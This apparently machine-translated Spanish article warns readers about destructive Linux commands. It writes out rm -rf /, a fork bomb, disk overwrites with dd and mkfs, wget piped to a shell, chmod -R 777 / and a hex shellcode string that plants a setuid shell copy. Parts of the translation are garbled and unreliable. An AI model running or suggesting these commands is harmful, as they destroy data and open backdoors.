La interfaz de línea de comandos es una utilidad poderosa y conveniente para administrar sistemas Linux. Proporciona una forma rápida y versátil de ejecutar un sistema, especialmente cuando se administran sistemas sin interfaz gráfica.
Si bien es útil en la gestión de sistemas, la línea de comandos está plagada de riesgos. Ejecutar el comando incorrecto puede causar daños irreversibles a su sistema. En esta guía, hemos reunido una lista de algunos de los comandos más riesgosos que no debería considerar ejecutar en su sistema.
Tabla de Contenidos
1. rm -rf /comando
Este comando rm es un comando de Linux para eliminar archivos y directorios en función de los parámetros utilizados.Sin embargo, debe usarse con extremo cuidado. RM El comando como un pequeño error tipográfico o error puede causar daños irreparables en el sistema.
cuando se ejecuta como root -rf /
opción, el comando elimina todos los archivos y directorios en el sistema recursivamente a partir del directorio raíz (/)
Este es el más alto en la estructura de jerarquía de archivos de Linux. en breve, rm -rf /
El comando borra completamente su sistema, causando que se corrompa e irrecuperable.
y comando rm Sí.
- RM Los comandos en Linux se utilizan para eliminar archivos.
- rm-r El comando elimina carpetas de forma recursiva, incluso carpetas vacías.
- rm-f Comando para eliminar «archivos de solo lectura» sin preguntar.
- rm -rf / : Forzar la eliminación de todo en el directorio raíz.
- rm -rf * : Fuerza la eliminación de todo en el directorio actual/directorio de trabajo.
- rm-rf. : Fuerza la eliminación de la carpeta y subcarpetas actuales.
De hecho, cuando ejecuta el comando como un usuario normal, recibirá dos advertencias en la terminal.
Supere el problema de eliminar archivos accidentalmente con ‘RM‘ comando, crea un alias ‘RM’ el comando es ‘rm-yo’ en el interior «.bashrc» archivo, le pedirá que confirme la eliminación cada vez.
2. :(){:|:&};: comando
La parte superior es en realidad una bomba de horquilla.Lo hace creando un ':'
, que se autodenomina dos veces, una en primer plano y otra en segundo plano. La ejecución repetida de esta función consume todos los recursos del sistema y hace que el sistema se bloquee.
De hecho, el comando de bomba de horquilla es esencialmente una forma de ataque DoS (denegación de servicio). También se conoce como el virus Wabbit o Rabbit. Lo peor de todo es que no necesita ser root para lanzar este ataque.
Afortunadamente, puede hacer esto limitando la cantidad de procesos que el usuario local puede ejecutar a aprox. 4000.
Puede hacer esto ejecutando el siguiente comando:
$ ulimit -S -u 4000
Puedes verificar esto más tarde con:
$ ulimit -u
3. Comando > /dev/sda
ejecuta el comando, luego >/dev/sda
cubrir /dev/sda
bloques en su disco duro. Este bloque contiene datos del sistema de archivos y, cuando se sobrescribe, puede causar que el sistema se dañe sin posibilidad de recuperación.
4. carpeta mv /dev/null
Otra acción dañina que no debe intentar es mover un directorio o archivo a /dev/null
. Este /dev/null
Un archivo es un tipo especial de archivo llamado dispositivo vacío o «agujero negro«. Cualquier movimiento a /dev/null
desechado y destruido.
El siguiente comando moverá todo el contenido del directorio de inicio del usuario a /dev/null
descartando así todos los datos contenidos en el directorio de inicio del usuario
# mv /home/user/* /dev/null
5. wget -O- |shh
El comando wget es un comando para descargar archivos desde un servidor web o de archivos. El comando anterior descarga un script de una fuente maliciosa y luego lo ejecuta.
6. mkfs.ext3 /dev/sda
Este mkfs El comando crea un nuevo sistema de archivos (ext2, ext3, ext4, etc.) en un dispositivo de almacenamiento formateado, que en la mayoría de los casos es una partición de un disco duro.correr mkfs Los comandos en la partición borran todos los datos almacenados en ella.
Si bien es útil al formatear particiones de disco, formatear una unidad completa (p. mkfs.ext3 /dev/sda) para bloquear el sistema y dejarlo en un estado irrecuperable. Esto sucede porque destruye todos los archivos del sistema, así como sus datos personales.
El comando también puede tomar otras formas, como se muestra a continuación.
# mkfs.ext4 /dev/sda # mkfs.xfs /dev/sda # mkfs.btrfs /dev/sda
7. > Comandos de archivo
Este >
file borra el contenido del archivo y lo deja vacío.es sinonimo gato /dev/null > archivo Ordenar. Por lo tanto, se debe tener cuidado al usar operadores de redirección en sistemas Linux.
A continuación se muestra una demostración de cómo el comando sobrescribe un archivo de texto. Cuando los archivos involucrados son archivos de configuración, puede imaginar el desastre que causará este comando.
8. ^foo^bar
Este ^foo^bar
El peligro y la utilidad del comando depende de cómo se ejecute. Si bien le permite editar comandos ejecutados previamente y ejecutarlos nuevamente, sería desastroso si no estuviera interesado en los cambios que realizó en el comando antes de ejecutarlo.
9. dd si=/dev/aleatorio de=/dev/sda
El comando anterior borra /dev/sda bloquear y escribir datos basura aleatorios en el bloque. Su sistema estará en una etapa inconsistente e irrecuperable.
10. chmod -R 777 /
Si bien es posible que no bloquee su sistema Linux de inmediato, chmod -R 777 /
El comando asigna recursivamente todos los permisos (lectura, escritura y ejecución) a todos los archivos en un sistema Linux a partir del directorio raíz.
Esto expone efectivamente todos los archivos de configuración críticos y otros archivos a todos los usuarios, lo que representa un gran riesgo de seguridad para su sistema. Cualquier persona con malas intenciones puede modificar archivos críticos y comprometer fácilmente su sistema.
11. Comandos ocultos
El siguiente comando no es más que el primer comando anterior (rm -rf)
Aquí el código está oculto en hexadecimal, por lo que podría engañar a los usuarios ignorantes. Ejecutar el siguiente código en su terminal borrará su partición raíz.
Este comando aquí muestra que las amenazas pueden estar ocultas y, a veces, a menudo indetectables. Tienes que saber lo que estás haciendo y cuáles serán los resultados. No compile ni ejecute código de fuentes desconocidas.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
notas: no ejecute ninguno de los comandos anteriores en su programa linux Terminal o shell o en la computadora de tu amigo o de la escuela. Si desea probarlos, ejecútelos en una máquina virtual.
Cualquier inconsistencia o pérdida de datos debido a la ejecución del comando anterior bloqueará su sistema, ya sea autor el articulo tampoco Tekmin Responsable.
Eso es todo hasta ahora. Volveré pronto con otro artículo interesante que a la gente le encantará leer.Hasta entonces, estad atentos y conectados a Tekmin.
Si conoces otros similares Comandos peligrosos de Linux Y desea que los agreguemos a la lista, háganoslo saber a través de la sección de comentarios y no olvide proporcionar sus valiosos comentarios.
Si aprecia lo que estamos haciendo en TecMint, debe considerar:
TecMint es el sitio comunitario de más rápido crecimiento y más confiable para artículos, guías y libros de Linux de cualquier tipo en la web. ¡Millones de personas visitan TecMint! Busque o explore miles de artículos publicados que están disponibles gratuitamente para todos.
Si le gusta lo que está leyendo, considere invitarnos a un café (o dos) como agradecimiento.
Agradecemos su apoyo interminable.